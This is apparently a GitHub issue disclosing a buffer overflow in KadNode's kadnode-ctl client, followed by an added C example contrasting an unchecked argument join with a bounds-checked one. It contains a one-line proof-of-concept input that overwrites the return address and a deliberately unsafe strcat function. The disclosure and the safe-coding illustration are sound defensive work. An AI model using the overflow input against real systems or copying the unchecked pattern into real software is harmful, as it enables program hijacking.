A user can overflow the buffer for kadnode-ctl and can control EIP using this. This implies the user can control the execution flow of the program.
Run the following command: ./kadnode-ctl $(python -c "print 'A' * 284 + 'BBBB'")
This will trigger a SIGSEGV and provide the output 0x42424242 in ?? ()
The line where this issue occurs is as follows: https://github.com/mwarning/KadNode/blob/master/src/ext-cmd.c#L378
91b3830
Hi, thanks for reporting the issue. It was sloppy programming on my part. xD The buffer overflow was in the client program part. It doesn't affect the daemon.
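A bounds-checked way to assemble command-line arguments into a fixed-size request buffer, shown next to the unchecked pattern that produces this class of overflow. This is an added example, not KadNode's code and not the fix in the referenced commit; REQUEST_MAX, the function names and the sample arguments are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define REQUEST_MAX 256 /* assumed size, not KadNode's actual buffer size */

/* Unchecked pattern, for contrast only: nothing compares the argument
 * length with the size of dst, so a long argument writes past the buffer
 * and over the saved return address on the stack. */
void join_args_unsafe(char *dst, int argc, char **argv)
{
    dst[0] = '\0';
    for (int i = 1; i < argc; i++) {
        strcat(dst, argv[i]);
        strcat(dst, " ");
    }
}

/* Bounded version: joins argv[1..] with single spaces. Returns the
 * resulting length, or -1 (leaving dst empty) if the joined string plus
 * its terminating NUL does not fit in dst_len bytes. */
int join_args_checked(char *dst, size_t dst_len, int argc, char **argv)
{
    size_t used = 0;

    if (dst_len == 0)
        return -1;
    dst[0] = '\0';
    for (int i = 1; i < argc; i++) {
        size_t n = strlen(argv[i]);
        size_t sep = (i > 1) ? 1 : 0;    /* space before 2nd+ argument */
        size_t remaining = dst_len - used; /* always >= 1 (room for NUL) */
        if (n >= remaining - sep) {        /* no room for sep + arg + NUL */
            dst[0] = '\0';
            return -1;
        }
        if (sep)
            dst[used++] = ' ';
        memcpy(dst + used, argv[i], n);
        used += n;
        dst[used] = '\0';
    }
    return (int)used;
}

int main(int argc, char **argv)
{
    char request[REQUEST_MAX];
    if (join_args_checked(request, sizeof(request), argc, argv) < 0) {
        fprintf(stderr, "arguments too long (max %d bytes)\n", REQUEST_MAX - 1);
        return 1;
    }
    printf("request: '%s'\n", request);
    return 0;
}
```

With the checked version, the 288-byte argument from the report is rejected with an error instead of being copied past the end of the buffer.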